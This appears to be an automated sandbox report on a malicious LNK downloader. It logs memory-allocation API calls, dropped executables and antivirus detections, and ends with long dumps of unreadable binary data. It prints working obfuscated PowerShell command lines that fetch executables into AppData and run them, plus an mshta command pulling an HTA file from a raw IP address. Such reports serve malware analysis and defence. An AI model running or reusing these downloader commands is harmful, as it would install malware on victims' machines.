allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bcc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bcd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bce000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bcf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c91000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c93000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c94000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\invoice.exe
file C:\Users\test22\AppData\Roaming\payment.exe
file C:\Users\test22\AppData\Local\Temp\Updated_Payments_Statements.link.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell.exe -ExecutionPolicy UnRestricted function SX($R, $Up){[IO.File]::WriteAllBytes($R, $Up)};function cx($R){if($R.EndsWith((y @(13161,13215,13223,13223))) -eq $True){Start-Process (y @(13229,13232,13225,13215,13223,13223,13166,13165,13161,13216,13235,13216)) $R}else{Start-Process $R}};function W($d){$xv = New-Object (y @(13193,13216,13231,13161,13202,13216,13213,13182,13223,13220,13216,13225,13231));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Up = $xv.DownloadData($d);return $Up};function y($c){$U=13115;$a=$Null;foreach($z in $c){$a+=[char]($z-$U)};return $a};function Tf(){$SL = $env:APPDATA + '\';$b = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13220,13225,13233,13226,13220,13214,13216,13161,13216,13235,13216));$TK = $SL + 'invoice.exe';SX $TK $b;cx $TK;;$Qw = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13227,13212,13236,13224,13216,13225,13231,13161,13216,13235,13216,13124));$Q = $SL + 'payment.exe ';SX $Q $Qw;cx $Q;;;}Tf;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function SX($R, $Up){[IO.File]::WriteAllBytes($R, $Up)};function cx($R){if($R.EndsWith((y @(13161,13215,13223,13223))) -eq $True){Start-Process (y @(13229,13232,13225,13215,13223,13223,13166,13165,13161,13216,13235,13216)) $R}else{Start-Process $R}};function W($d){$xv = New-Object (y @(13193,13216,13231,13161,13202,13216,13213,13182,13223,13220,13216,13225,13231));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Up = $xv.DownloadData($d);return $Up};function y($c){$U=13115;$a=$Null;foreach($z in $c){$a+=[char]($z-$U)};return $a};function Tf(){$SL = $env:APPDATA + '\';$b = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13220,13225,13233,13226,13220,13214,13216,13161,13216,13235,13216));$TK = $SL + 'invoice.exe';SX $TK $b;cx $TK;;$Qw = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13227,13212,13236,13224,13216,13225,13231,13161,13216,13235,13216,13124));$Q = $SL + 'payment.exe ';SX $Q $Qw;cx $Q;;;}Tf;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $dR=@(42117,42123,42112,42124,42105,42040,42112,42124,42124,42120,42066,42055,42055,42057,42063,42065,42054,42060,42059,42054,42057,42064,42063,42054,42057,42064,42059,42055,42112,42112,42110,42117,42055,42113,42118,42126,42119,42113,42107,42109,42054,42112,42124,42105);$H=@(42081,42077,42096);function J($UD){$dR=42008;$Pf=$Null;foreach($pb in $UD){$Pf+=[char]($pb-$dR)};return $Pf};sal QbxXCDZHn (J $H);QbxXCDZHn((J $dR));
cmdline "C:\Windows\system32\mshta.exe" http://179.43.187.183/hhfm/invoice.hta
file C:\Users\test22\AppData\Roaming\invoice.exe
file C:\Users\test22\AppData\Roaming\payment.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function SX($R, $Up){[IO.File]::WriteAllBytes($R, $Up)};function cx($R){if($R.EndsWith((y @(13161,13215,13223,13223))) -eq $True){Start-Process (y @(13229,13232,13225,13215,13223,13223,13166,13165,13161,13216,13235,13216)) $R}else{Start-Process $R}};function W($d){$xv = New-Object (y @(13193,13216,13231,13161,13202,13216,13213,13182,13223,13220,13216,13225,13231));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Up = $xv.DownloadData($d);return $Up};function y($c){$U=13115;$a=$Null;foreach($z in $c){$a+=[char]($z-$U)};return $a};function Tf(){$SL = $env:APPDATA + '\';$b = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13220,13225,13233,13226,13220,13214,13216,13161,13216,13235,13216));$TK = $SL + 'invoice.exe';SX $TK $b;cx $TK;;$Qw = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13227,13212,13236,13224,13216,13225,13231,13161,13216,13235,13216,13124));$Q = $SL + 'payment.exe ';SX $Q $Qw;cx $Q;;;}Tf;
filepath: powershell.exe
1 1 0
Bkav VEX.Webshell
Sangfor Trojan.Generic-LNK.Save.08c86e64
Symantec CL.Downloader!gen111
ESET-NOD32 LNK/TrojanDownloader.Agent.AJP
Tencent Win32.Trojan-downloader.Agent.Eerv
Sophos Troj/LnkObf-G
SentinelOne Static AI - Suspicious LNK
VBA32 Trojan.Link.ShellCmd
Zoner Probably Heur.LNKScript
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received k (#%d) at 0x%p. CRT detected that the application wrote to memory after end of heap buffer. HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p. CRT detected that the application wrote to memory after end of heap buffer. Memory allocated at %hs(%d). HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p. CRT detected that the application wrote to memory before start of heap buffer. HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p. CRT detected that the application wrote to memory before start of heap buffer. Memory allocated at %hs(%d). Client hook free failure. The Block at 0x%p was allocated by aligned routines, use _aligned_free()_msize_dbg%hs located at 0x%p is %Iu bytes long. %hs located at 0x%p is %Iu bytes long. Memory allocated at %hs(%d). HEAP CORRUPTION DETECTED: on top of Free block at 0x%p. CRT detected that the application wrote to a heap buffer that was freed. HEAP CORRUPTION DETECTED: on top of Free block at 0x%p. CRT detected that the application wrote to a heap buffer that was freed. Memory allocated at %hs(%d). DAMAGED_heapchk fails with unknown return value! _heapchk fails with _HEAPBADPTR. _heapchk fails with _HEAPBADEND. _heapchk fails with _HEAPBADNODE. _heapchk fails with _HEAPBADBEGIN. _CrtSetDbgFlag(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)Bad memory block found at 0x%p. Bad memory block found at 0x%p. Memory allocated at %hs(%d). _CrtMemCheckpointstate != NULLObject dump complete. crt block at 0x%p, subtype %x, %Iu bytes long. normal block at 0x%p, %Iu bytes long. client block at 0x%p, subtype %x, %Iu bytes long. {%ld} %hs(%d) : #File Error#(%d) : Dumping objects -> Data: <%s> %s _printMemBlockData%.2X Detected memory leaks! LC_TIMELC_NUMERICLC_MONETARYLC_CTYPELC_COLLATELC_ALLüF@0[BðF@0OH0[BäF@0OH.AØF@0OH@UBÌF@0OHðQBÄF@0OHÀGB  !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.csetlocaleLC_MIN <= _category && _category <= LC_MAXstrncpy_s(lctemp, (sizeof(lctemp) / sizeof(lctemp[0])), s, len)_setlocale_nolock;=;strcpy_s(pch + sizeof(int), cch - sizeof(int), lctemp)_setloca
Data received ¸~E°ð偭$ÿÿÿI#P"­hÿÿÿ†~\Eôêj9…$ÿÿÿj™ EŒÂøC.mŒ¼èÊ?E°œ^è2…hÿÿÿãcM…Èþÿÿcw‚w…ÈþÿÿÏçÍ{Eô&)­$ÿÿÿqjÁ…ÈþÿÿiõªVmlÒGmT°æc3Eœ<Û(s­hÿÿÿ™Ò"­ÈþÿÿwŸml÷›[PE8vpÁ&… ÿÿÿ¶| Elcäì m¤/mœ¹—–M…hÿÿÿø6ˆ8mŒ ý¾O­hÿÿÿí»“s…hÿÿÿ·ÑšCmœƒËEô7¬EpEœºø¦{… ÿÿÿoÙâ_­lÿÿÿ•uÕ,…lÿÿÿ¹3môD,mŒcÐð0…hÿÿÿÍM}mô9´êmôœ+O­ ÿÿÿ%(?…$ÿÿÿ;{_­àþÿÿ@øEŒšNVF­hÿÿÿÆ*á6E881vk­hÿÿÿñsρ­ÐþÿÿÔQ+`…$ÿÿÿÝñìb…Èþÿÿ]ŠÔEÌ܉§=­$ÿÿÿ¾ÑU.EØcjs.m8Øtym¤i¼ŠKmŒæS4mTý@»_E̲o}kEœA¹ÀZ…$ÿÿÿ÷¸…4ÿÿÿºP,mX•‹Zm8×Ξl…àþÿÿ…ØþÿÿL¹„dmʂJ­ÿÿÿÕЫjmô¥Ù=…,ÿÿÿ9UuEàÔíÏ&mŒ=aÒtmà:»Ú&…ØþÿÿÅS“X… ÿÿÿ¶(½wmà/bE´E̓¸èE@Xlä/…DÿÿÿyVmô&ˆœx­pÿÿÿ˜Z¢;E°/±xEÌs¢J…lÿÿÿõ±§Cm8{dpmÌ+LXE¸¥Þ ­ÿÿÿÍ֜­Ðþÿÿfq­$ÿÿÿY÷wnmŒ^¢x­ ÿÿÿ§,%xm˜BÄâqml@€˜…,ÿÿÿ,^ӁmT¦˜Êp…xÿÿÿ3ÀyEŒÿÔ7#…lÿÿÿ×h&E8;)ElJUÁm¼Œƒ%…Ðþÿÿ·w¥E¼øEüU…)màRۍ%…ðþÿÿ°’XEnÖõC­(ÿÿÿ‚|x?…ÿÿÿ³´TEÀå¢K]­Èþÿÿ¸JnE¼¦ÍQm8fâN­ÿÿÿ¶Ó:D…pÿÿÿS ªn…äþÿÿj=­àþÿÿë …Èþÿÿý· mT+X‰ …àþÿÿ¹ð#EŒKñB­ ÿÿÿíT1mÔ8zEü ÆIMEèea½…pÿÿÿoŸÈO…lÿÿÿf)âkE¤Ü¨²TEŒ.Ñ8…0ÿÿÿà1`EvY¾Pm8Þ5ì m¬‹«r­ÿÿÿF‹ý~…Ðþÿÿ*ÜR­ÿÿÿµÃe­ÿÿÿ;3¬T…(ÿÿÿÒ8NEðvr‘(­8ÿÿÿž?1EÄhò…hÿÿÿ¾|Rd­8ÿÿÿ&‚Y…pÿÿÿô7ómü ôs­(ÿÿÿygEø¶(Œ!m:øWvElM®—*E8A2Ý2mؼÓîEØ¡—gC…ðþÿÿ ÿã-mH¾9Î>m¼[õX­tÿÿÿÆ聭 ÿÿÿÜÒ ET‹é5E¼ög¦w­LÿÿÿaúW4… ÿÿÿCҕx…,ÿÿÿ¤>q­lÿÿÿ𶳁EÌÁ¼™m¿,ØKm¤‘ q­4ÿÿÿÁ<E@ƦE Ó·ˆJ…Pÿÿÿ “­Lÿÿÿ¿_–nm\õՖ[miEBÑom Ï)mð3ځ­Hÿÿÿ…Å‹…Øþÿÿ!a*­äþÿÿšc(­ÿÿÿSÖþ|EˆB´Î2Eèë'­Ðþÿÿ”< yE´Šæ EÜSFEhm@à À_­àþÿÿœ¢#…0ÿÿÿÆû$1E<}§9…4ÿÿÿ‚Èþ­Üþÿÿÿ£Ñ<m¸‹j™d­ÿÿÿÒ$­Ìþÿÿދ‚mèű.*­ÿÿÿ¹à±­ÈþÿÿŒgL<…DÿÿÿJìy­ðþÿÿ¼±dE ¸:…4ÿÿÿ¼jîxEÌp­&7E\!}kn­HÿÿÿʙŒ!mà䓤­Hÿÿÿ¯F…Ìþÿÿ*/0^­tÿÿÿ{(恭ôþÿÿãP…Im„ž>ÕkEðR>mœQ E¼i ځ…@ÿÿÿ{:X1EHIYmø.KgzE8KÝõOE³µ?…ÿÿÿR)[Ew¡è:­XÿÿÿPÔAXmèžç²umàpf$G­dÿÿÿû*끅ÿÿÿKó‘<­øþÿÿP¥cEÈ#—l ­xÿÿÿy*C(E¶{môwÈì6EœXëU…HÿÿÿH¥ù ­èþÿÿÚ|2IE°);›M…ÿÿÿRïp.mÔzŸ¶q…ÿÿÿk븁­ÿÿÿY•¼Wm€¤ü ­ÿÿÿ²Ò0E$éYl…<ÿÿÿª?,EÆ¿F­ÿÿÿI73 mˆ‘(REàí¦Ï_…lÿÿÿ¼ÅTmlƒ 9m´í’‹)E Fánpm´^×úmˆV#zmÝ2ÇImè*­Dÿÿÿm·pHm¼Q£äm¬6m’ÒJ­ÿÿÿÓÞÇrEd¨ kmÀBec…xÿÿÿîþŁmd–sq!m䨄X…ØþÿÿEùìBE,W¡ð4m€Ç#…^…ôþÿÿLº°Z…èþÿÿ<ØF…TÿÿÿdVb­üþÿÿƒÿEì.LúiEPx°L9­TÿÿÿLí¯$…|ÿÿÿ0þh…ÈþÿÿBr)Dm˜±S±mméf\Km”gï…Im¸bd8L­ ÿÿÿ¾×­ ÿÿÿÞ|k7mÐÒõ­pÿÿÿ‘çt­PÿÿÿkR¦xm˜«¨,…Üþÿÿ3P¦0­0ÿÿÿ°Ü.BED©5…,ÿÿÿúÞj-E /Y>mhZÅQEè|\úV­àþÿÿ™ã07…ÈþÿÿF®Wj…ôþÿÿñ¨qm„Ñsþ ­`ÿÿÿé咁EÀŠbEü:qm$÷PšGmX»–•{­\ÿÿÿÜ큭|ÿÿÿzõ-­\ÿÿÿ?©™7m@`¸?E4ò¸9m@O¥àA­ìþÿÿ6 āE4ø$5mhõqEáETªúÚc…Lÿÿÿ}ºïmP¹t÷Eå)£(E0 …øþÿÿ¯jDf­PÿÿÿGu=­Èþÿÿ.›«…ÐþÿÿûŒm(€[To…ÔþÿÿmÎþ?­tÿÿÿ_­&am`Fs(Eà”m¨ôA‹…øþÿÿ*QRfmÈ vÿE ÌymL·Î*dmˆ¥z×'‹Ex‹M|)ƒÅpÉ‹D$‹L$)‹D$‹L$)ÂÂU‹ìQƒeü‹EEü‹Eü3E ‹M‰É U‹ìQÇEü‹E Eüƒmü‹E‹Mü1ÉÂU‹ì‹M‹‰E‹E E‹E‰]ÂU‹
Data received t8ƒ}Ðt2ÿUԉEìƒ}ìtUàRj EðPj‹MìQÿUЅÀt‹UøƒâuÇE܃}Üt ‹E ‰Eë[‹ ؋`;Müt‹؋`RèÈØÿÿƒÄ‰Ẽ}ÌtÿỦEèƒ}èt,¡Ü‹`;Eüt"‹ ܋`QèšØÿÿƒÄ‰Eȃ}Èt ‹UèRÿUȉEè¡Ô‹`PèyØÿÿƒÄ‰Eă}Ät‹MQ‹U R‹EP‹MèQÿUÄëë3À‹å]ËÿU‹ìQE‰Eü‹MüQj‹UR‹EP‹M Q‹URèíƒÄ‹å]ÃÌ̋ÿU‹ìQ‹E‰Eü‹Mü·‹EüƒÀ‰Eü…Òtëë‹Eü+EÑøƒè‹å]ËÿU‹ìƒì(ƒ}tƒ} v ÇEèëÇEè‹Eè‰Eôƒ}ôuhd@jjh¨S@jè JÿÿƒÄƒøũ}ôu0èǽÿÿÇjjh¨S@hèc@hd@èHÿÿƒÄ¸éXƒ}…¿3ҋEf‰ƒ} ÿtK} ÿÿÿtBƒ} v<‹M ƒé9 TCHs ‹TCH‰Uäë ‹E ƒè‰Eä‹MäÑáQhþ‹UƒÂRèüTÿÿƒÄ 3Àƒ}•À‰Eðƒ}ðuhlS@jjh¨S@jèBIÿÿƒÄƒøũ}ðu0èþ¼ÿÿÇjjh¨S@hèc@hlS@èPGÿÿƒÄ¸é‹U‰Uü‹E ‰Eø‹Mü‹Uf‹f‰‹Mü·‹EüƒÀ‰Eü‹MƒÁ‰M…Òt ‹Uøƒê‰Uøtë˃}ø…Ò3À‹Mf‰ƒ} ÿtJ} ÿÿÿtAƒ} v;‹U ƒê9TCHs ¡TCH‰Eàë ‹M ƒé‰Mà‹UàÑâRhþ‹EƒÀPèóSÿÿƒÄ ¹DS@…Ét 3Òt ÇEÜëÇE܋E܉Eìƒ}ìuhS@jjh¨S@jè"HÿÿƒÄƒøũ}ìu-èÞ»ÿÿÇ"jjh¨S@hèc@hS@è0FÿÿƒÄ¸"ërƒ} ÿtj} ÿÿÿta‹U +UøƒÂ;U sS‹E +EøƒÀ‹M +È9 TCHs ‹TCH‰UØë‹E +EøƒÀ‹M +ȉM؋UØÑâRhþ‹E +Eø‹MTARè SÿÿƒÄ 3À‹å]ËÿU‹ìƒ=ø‰`uj‹EP‹M Q‹URhPHè*ƒÄëëj‹EP‹M Q‹URjèƒÄ]ÃÌÌÌÌÌÌÌÌ̋ÿU‹ìjÿh¨Cd¡PƒìH¡dCH3ÅPEôd£‹EPMÔè]XÿÿÇEüƒ}t‹M‹U ‰3Àƒ} •À‰Ẽ}Ìuh e@jj^hÀd@jè±FÿÿƒÄƒøũ}ÌuDèmºÿÿÇjj^hÀd@h¬d@h e@è¿DÿÿƒÄÇEÄÇEüÿÿÿÿMÔè¶Xÿÿ‹EÄé ƒ}tƒ}|ƒ}$~ ÇE´ëÇE´‹U´‰Uȃ}ÈuhXd@jj_hÀd@jèFÿÿƒÄƒøũ}ÈuDè×¹ÿÿÇjj_hÀd@h¬d@hXd@è)DÿÿƒÄÇEÀÇEüÿÿÿÿMÔè Xÿÿ‹EÀév‹M ‰MðÇEЋUðŠˆEç‹MðƒÁ‰MðMÔè"Xÿÿ…Àt0MÔèXÿÿ‹ƒº¬~MÔèXÿÿPj¶EçPèHƒÄ ‰E°ëj¶MçQMÔèßWÿÿPèIGƒÄ ‰E°ƒ}°t‹UðŠˆEç‹MðƒÁ‰Mð됾Uçƒú-u‹EƒÈ‰E‹MðŠˆUç‹EðƒÀ‰Eðë¾Mçƒù+u‹UðŠˆEç‹MðƒÁ‰Mðƒ}| ƒ}tƒ}$~.ƒ}t‹U‹E ‰ÇE¼ÇEüÿÿÿÿMÔèWÿÿ‹E¼ékë>ƒ}u8¾Mçƒù0t ÇE ë&‹Uð¾ƒøxt ‹Mð¾ƒúXu ÇEëÇEƒ}u8¾Eçƒø0t ÇE ë&‹Mð¾ƒúxt ‹Eð¾ƒùXu ÇEëÇEƒ}u9¾Uçƒú0u0‹Eð¾ƒùxt ‹Uð¾ƒøXu‹MðƒÁ‰Mð‹UðŠˆEç‹MðƒÁ‰Mð¸ÿÿÿÿ3Ò÷u‰Eèj¶UçRMÔèdVÿÿPèÎEƒÄ …Àt ¾Eçƒè0‰EìëQh¶MçQMÔè9VÿÿPè£EƒÄ …Àt0¾Uçƒúa|¾Eçƒøz ¾Mçƒé ‰M¬ë¾Uç‰U¬‹E¬ƒè7‰Eìëëf‹Mì;Mrë\‹UƒÊ‰U‹EÐ;Eèr‹MÐ;MèuƒÈÿ3Ò÷u9Uìw‹UЯUUì‰UÐë‹EƒÈ‰Eƒ}uë‹MðŠˆUç‹EðƒÀ‰Eðé!ÿÿÿ‹Mðƒé‰Mð‹Uƒâuƒ}t‹E ‰EðÇEÐëf‹Mƒáu*‹UƒâuV‹Eƒàt }Ѐw‹Mƒáu=}Ðÿÿÿv4臶ÿÿÇ"‹Uƒât ÇEÐÿÿÿÿë‹Eƒàt ÇEЀëÇEÐÿÿÿƒ}t‹M‹Uð‰‹Eƒàt‹MÐ÷ىMЋUЉU¸ÇEüÿÿÿÿMÔè¥Tÿÿ‹E¸‹Môd‰ Y‹å]ÃÌÌ̋ÿU‹ìƒ=ø‰`uj‹EP‹M Q‹URhPHè*ƒÄëëj‹EP‹M Q‹URjèƒÄ]ÃÌÌÌÌÌÌÌÌ̋ÿU‹ìjÿhØCd¡PƒìlVW¡dCH3ÅPEôd£‹EPMÐè+SÿÿÇEüƒ}t‹M‹U ‰3Àƒ} •À‰EÀƒ}Àuh e@jj^hPe@jèAÿÿƒÄƒøũ}ÀuNè;µÿÿÇjj^hPe@h<e@h e@è?ÿÿƒÄÇE´ÇE¸ÇEüÿÿÿÿMÐè}Sÿÿ‹E´‹U¸é<ƒ}tƒ}|ƒ}$~ ÇE ëÇE ‹U ‰U¼ƒ}¼uhXd@jj_hPe@jèß@ÿÿƒÄƒøũ}¼uN蛴ÿÿÇjj_hPe@h<e@hXd@èí>ÿÿƒÄÇE¬ÇE°ÇEüÿÿÿÿMÐèÝRÿÿ‹E¬‹U°éœ‹M ‰MðÇEÄÇEȋUðŠˆEã‹MðƒÁ‰MðMÐèÕRÿÿ…Àt0MÐèÉRÿÿ‹ƒº¬~MÐè¶RÿÿPj¶EãPèÉBƒÄ ‰E
Data received •À‰Eüƒ}üuhÄ$@jjbhž@jèD.þÿƒÄƒøũ}üu0è¢þÿÇjjbhž@hdž@hÄ$@èR,þÿƒÄ¸ÿÿÿé‰3҃} •Â‰Uøƒ}øuh4$@jjchž@jèÞ-þÿƒÄƒøũ}øu-蚡þÿÇjjchž@hdž@h4$@èì+þÿƒÄ¸ÿÿÿë&‹M Q‹URè•þÿÿƒÄëëj‹E P‹MQèÏüÿÿƒÄ ‹å]ÃÌÌÌÌÌÌÌ̋ÿU‹ìƒì@ƒ}„!‹EPMèèÂ>þÿ3Ƀ}•Á‰Mäƒ}äuhÄ$@jj;h¸ž@jè+-þÿƒÄƒøũ}äu=èç þÿÇjj;h¸ž@hœž@hÄ$@è9+þÿƒÄÇEØÿÿÿMèè7?þÿ‹EØé¤3Àƒ} •À‰Eàƒ}àuh4$@jj<h¸ž@jè¸,þÿƒÄƒøũ}àu=èt þÿÇjj<h¸ž@hœž@h4$@èÆ*þÿƒÄÇEÔÿÿÿMèèÄ>þÿ‹EÔé1ºÿÿÿ;UÀƒÀ‰EÜuhxž@jj=h¸ž@jèE,þÿƒÄƒøũ}Üu=è þÿÇjj=h¸ž@hœž@hxž@èS*þÿƒÄÇEÐÿÿÿMèèQ>þÿ‹EÐ龍Mèèq>þÿ‹ƒzu)‹EP‹M Q‹URè$ƒÄ ‰E̍Mèè>þÿ‹EÌé‡ëm‹E¶‰MčMèè/>þÿP‹UÄRè"ƒÄ‰Eü‹EƒÀ‰E‹M ¶‰UÀMèè>þÿP‹EÀPèÛ!ƒÄ‰Eø‹M ƒÁ‰M ‹Uƒê‰Utƒ}üt‹Eü;Eøt“‹Mü+Mø‰MȍMèè’=þÿ‹EÈë3À‹å]ÃÌÌÌÌÌÌ̋ÿU‹ìƒì ƒ=ø‰`…Y3Àƒ}•À‰Eüƒ}üu!hÄ$@jh‚h¸ž@jèñ*þÿƒÄƒøũ}üu3譞þÿÇjh‚h¸ž@hŸ@hÄ$@èü(þÿƒÄ¸ÿÿÿé3҃} •Â‰Uøƒ}øu!h4$@jhƒh¸ž@jè…*þÿƒÄƒøũ}øu3èAžþÿÇjhƒh¸ž@hŸ@h4$@è(þÿƒÄ¸ÿÿÿ闹ÿÿÿ;M҃‰Uôu!hxž@jh„h¸ž@jè*þÿƒÄƒøũ}ôu0è՝þÿÇjh„h¸ž@hŸ@hxž@è$(þÿƒÄ¸ÿÿÿë.‹MQ‹U R‹EPè "ƒÄ ëëj‹MQ‹U R‹EPè?üÿÿƒÄ‹å]ÃÌÌÌÌÌÌÌ̋ÿU‹ìjþhp,Ch0„Ad¡PƒÄðSVW¡dCH1Eø3ÅPEðd£ÇEäÿÿÿÿ3Àƒ}•À‰Eàƒ}àuht+@jj/h@Ÿ@jè@)þÿƒÄƒøũ}àu+èüœþÿÇjj/h@Ÿ@h0Ÿ@ht+@èN'þÿƒÄƒÈÿëW‹U‹B ƒà@t ‹MÇA ë=‹URè6ŽþÿƒÄÇEü‹EPèCƒÄ‰EäÇEüþÿÿÿèë ‹MQ覎þÿƒÄËEä‹Mðd‰ Y_^[‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ìƒì ÇEøÿÿÿÿ3Àƒ}•À‰Eôƒ}ôuh-@jjZh@Ÿ@jèZ(þÿƒÄƒøũ}ôu.èœþÿÇjjZh@Ÿ@h Ÿ@h-@èh&þÿƒÄƒÈÿ邋U‰Uü‹Eü‹H áƒta‹UüRèðŽþÿƒÄ‰Eø‹EüPè#ƒÄ‹MüQèeõþÿƒÄPèŒ ƒÄ…À} ÇEøÿÿÿÿë$‹Uüƒztj‹Eü‹HQèÕXþÿƒÄ‹UüÇB‹EüÇ@ ‹Eø‹å]ÃÌÌÌÌÌÌ̋ÿU‹ìQƒ}Œ·‹E;è”`ƒ¨‹MÁù‹UƒâÁ⋍•`¾Lƒá„„‹UÁú‹EƒàÁà‹ ••`ƒ<ÿthƒ=@CHu<‹U‰Uüƒ}ütƒ}ütƒ}ütë"jjöÿ@ëjjõÿ@ë jjôÿ@‹EÁø‹MƒáÁá‹…•`Çÿÿÿÿ3Àëë蔚þÿÇ è¹šþÿǃÈÿ‹å]ÃÌÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ìƒì ƒ}þu荚þÿÇèRšþÿÇ ƒÈÿé2ƒ}|‹E;è”`s ÇEôëÇEô‹Mô‰Müƒ}üu!h‹@jh:hàŸ@jè/&þÿƒÄƒøũ}üu<èšþÿÇèà™þÿÇ jh:hàŸ@hÀŸ@h‹@è/$þÿƒÄƒÈÿ颋EÁø‹MƒáÁá‹…•`¾D ƒà÷ØÀ÷؉Eøu!h|Š@jh;hàŸ@jè£%þÿƒÄƒøũ}øu9菙þÿÇèT™þÿÇ jh;hàŸ@hÀŸ@h|Š@è£#þÿƒÄƒÈÿë‹UÁú‹EƒàÁà‹ ••`‹‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ìjþh,Ch0„Ad¡PƒÄðSVW¡dCH1Eø3ÅPEðd£‹EÁø‹MƒáÁá …•`‰MàÇEä‹Uàƒzuaj èn•þÿƒÄÇEü‹Eàƒxu.h ‹MàƒÁ QèÚ¡ÿÿƒÄ…ÀuÇEä‹Uà‹BƒÀ‹Mà‰AÇEüþÿÿÿèë j èX•þÿƒÄÃ}ät!‹UÁú‹EƒàÁà‹ ••`T Rÿ8@‹Eä‹Mðd‰ Y_^[‹å]ÃÌÌÌÌÌÌÌ̋ÿU‹ì‹EÁø‹MƒáÁá‹…•`D Pÿ<@]ÃÌÌÌÌÌÌÌ̋ÿU‹ìƒì¡dCH3ʼnEôƒ=(RHtsƒ=´RHþuè÷ƒ=´RHÿu ¸ÿÿé°ëPjEüPjMQ‹´RHRÿ˜@…Àu)ƒ=(RHuÿ¸@ƒøxu 